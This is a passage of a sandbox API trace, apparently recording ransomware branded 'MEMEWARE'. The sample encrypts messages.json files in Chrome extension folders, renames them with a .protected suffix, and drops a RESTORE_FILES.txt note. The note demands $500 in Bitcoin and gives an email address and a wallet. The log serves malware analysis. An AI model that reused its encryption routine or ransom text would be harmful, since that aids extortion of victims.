liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.026] CloseHandle (hObject=0x168) returned 1 [0079.026] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected") returned 165 [0079.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.027] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0079.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.027] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.027] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.028] lstrlenA (lpString="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") returned 684 [0079.028] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.028] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.028] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.028] CloseHandle (hObject=0x164) returned 1 [0079.028] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.028] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.028] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned 141 [0079.028] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.028] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.028] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*") returned 143 [0079.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\.") returned 143 [0079.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.029] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\..") returned 144 [0079.029] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.029] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.029] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.029] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.029] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") 
returned 155 [0079.029] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.029] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0079.030] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.030] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0079.031] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0079.031] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.031] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.031] CloseHandle (hObject=0x168) returned 1 [0079.031] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected") returned 165 [0079.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.032] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0079.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.032] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.032] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.033] lstrlenA (lpString="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") returned 684 [0079.033] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.033] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.033] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.033] CloseHandle (hObject=0x164) returned 1 [0079.033] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0079.033] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned 141 [0079.033] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0079.033] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0079.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*") returned 143 [0079.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.034] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\.") returned 143 [0079.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\..") returned 144 [0079.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") 
returned 155 [0079.034] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.034] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.036] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0079.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0079.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.037] CloseHandle (hObject=0x168) returned 1 [0079.038] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected") returned 165 [0079.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected")) returned 1 [0079.038] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.038] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.038] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0079.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.039] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a 